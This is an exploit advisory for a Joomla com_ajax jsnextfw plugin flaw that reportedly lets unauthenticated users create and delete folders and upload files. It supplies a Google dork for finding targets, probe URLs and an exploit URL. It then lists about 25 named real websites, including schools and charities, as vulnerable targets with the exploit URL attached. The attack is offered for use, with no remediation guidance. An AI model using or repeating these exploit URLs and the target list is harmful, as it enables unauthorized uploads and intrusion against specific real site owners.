#################################################################################################
# Exploit Title : Joomla Com_Ajax Component Jsnextfw Plugin Jform_Article Incorrect Default Permission Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 24/10/2018
# Vendor Homepage : joomla.org
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork : inurl:/index.php?option=com_ajax
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]
+ CWE-287 - [ Improper Authentication ] - CWE-399 - [ Resource Management Errors ]
+ CWE-20 - [ Improper Input Validation ] - CWE-284 - [ Improper Access Control ]
+ CWE-306 - [ Missing Authentication for Critical Function ]
#################################################################################################
# Admin Panel Login Path =>
/administrator
# Check for Error Message and Vulnerability on the websites =>
/index.php?option=com_ajax&format=json
/PATH/index.php?option=com_ajax&format=json
/index.php/component/ajax/
{"success":true,"message":null,"messages":null,"data":null}
# Exploit =>
/index.php?option=com_ajax&format=html&plugin=jsnextfw&context=media-selector&type=image&folder=
images&6142fd345ac817417f35bde90a0ed787=1&editor=jform_articletext&tmpl=component
# Directory Path => /images/...
Note =>
# We can create a folder.
# We can Delete Folder[s]
# Upload a File without administration permissions.
#################################################################################################
# Example Vulnerable Sites =>
stpsahid.ac.id/index.php?option=com_ajax&format=html&plugin=jsnextfw&context=media-selector&type=image&folder=
images&6142fd345ac817417f35bde90a0ed787=1&editor=jform_articletext&tmpl=component
joomla.org/index.php?option=com_ajax&format=json => [ Proof of Concept ] => archive.is/77gHL
impostos.ad/index.php?option=com_ajax&format=json
bplimmobiliare.it/joomla/index.php?option=com_ajax&format=json
camntech.com/index.php?option=com_ajax&format=json
aavopl.org/index.php?option=com_ajax&format=json
burnetts-ea.com/index.php?option=com_ajax&format=json
driffieldschool.net/index.php?option=com_ajax&format=json
aspenoss.com/index.php?option=com_ajax&format=json
atrainability.co.uk/index.php?option=com_ajax&format=json
emotionfactory.com/index.php?option=com_ajax&format=json
felicitysarran.co.uk/index.php?option=com_ajax&format=json
accesstalent.co.uk/index.php?option=com_ajax&format=json
abc.org.uk/index.php?option=com_ajax&format=json
astonacademy.org/index.php?option=com_ajax&format=json
catholiceducation.org.uk/index.php?option=com_ajax&format=json
burystedmundsramblers.org.uk/index.php?option=com_ajax&format=json
pefc.org/index.php?option=com_ajax&format=json
learning-disability.org.uk/index.php?option=com_ajax&format=json
lesresidencesniable.com/index.php?option=com_ajax&format=json
smrt.bristol.sch.uk/index.php?option=com_ajax&format=json
flonflons.eu/index.php?option=com_ajax&format=json
keadventure.com/index.php?option=com_ajax&format=json
uzvonu.com/cs/?option=com_ajax&format=json
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################